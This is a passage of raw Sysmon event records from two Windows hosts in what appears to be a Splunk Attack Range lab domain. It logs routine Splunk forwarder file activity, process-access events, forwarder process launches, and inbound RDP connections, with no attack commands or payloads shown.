23542300x8000000000000000978414Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:42.861{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEA344815FE49EA3F81E790ECEF3D114,SHA256=7AFFBECF068B981CFF787FB6C9EC82A07F8B9B898DEF3F7789D8E5950C521939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:42.592{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93141B21AD0255AE0B35082CA8D1854A,SHA256=314E969AC6B7277C675A4C8BEF9EDE4B15399B4DE72913BB26BA75CAD8623DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:43.976{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EF11EBD10E766B2EDEDCC2CC90BEAB4B,SHA256=995FFF4299996BCE8A36BB7AFEEF7A5EB606AB3C9A8ECED09AC89290FB137B8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:43.607{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4AB0A8A80F3CA30D31831979083B561,SHA256=FF391E80FD0C8BEA5A0A9159A7D4A68B9FCF0AFCD27A5F064BC893773E441523,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978415Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:40.591{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52445-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978417Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:44.548{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F03B311BE92BB2A9322D03185EB69CA5,SHA256=CB24811B7F1BCAC60E50AB087487A0FF4F1FAD922B2A97258E77F71447A6B16A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978416Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:44.079{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24BBF411C7DACCE28193659F1D45F9FD,SHA256=414FA43CA8FBEC3838C26558C14138F668AA6EF078E5C80B3A58854011F0D854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.676{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7152B8B4891756DDCCE6590F7D4337DB,SHA256=EFF581A3023691B115CB81AD576AD89BBF8A1AD5C4D90D00A9C76DA923635F22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.676{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9AAE7E668FDF799FE9EF301E7461B40,SHA256=E8A66EE88AC2BEBDF407AA37D50E0EB8EA10D7F8FB075DF703274FC21E4B3E63,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A58-6151-247A-00000000FC01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8A58-6151-247A-00000000FC01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.644{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A58-6151-247A-00000000FC01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:44.623{5EBD8912-8A58-6151-247A-00000000FC01}6676C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:42.768{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53336-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:42.324{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52851-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978418Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:45.314{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07DA67E2CDB540E274988D69D0E19F5E,SHA256=E3518FC68DF8FD3A92BAB0562B9CD82C2AC3AAD168904611C4791DA43A1C765C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.676{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B63A4611FB418B51ABB77CD11805E98F,SHA256=8621E2D3402AFE9A759B4F9D1A1CCCAC63BF56BD7F89CE73DE2EDE25CD6A65C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.644{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A74B9490DE276D81540D6F44FD1FDA02,SHA256=A9B36954B640854F5C87223E864DC3D007BD58078E068ADE7ADF48DA26DDE65E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A59-6151-257A-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8A59-6151-257A-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.329{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A59-6151-257A-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:45.323{5EBD8912-8A59-6151-257A-00000000FC01}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.706{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1D0DBBE2E5AC174CF17D600AE8882D7,SHA256=307B4382B19AB7877AA105241CC874A88D40E644C07714688FA4A4FB749611A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978420Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:43.770{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59360-false10.0.1.12-8000- 23542300x8000000000000000978419Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:46.345{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=992EB4F967E0BE314BF51659B61060ED,SHA256=B89C4E469C81F76D2BEF8AFFE7CC6ED99EB11CE8A46C7158717C5991782D2846,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.176{5EBD8912-8A59-6151-267A-00000000FC01}36685116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.007{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A59-6151-267A-00000000FC01}3668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:46.007{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 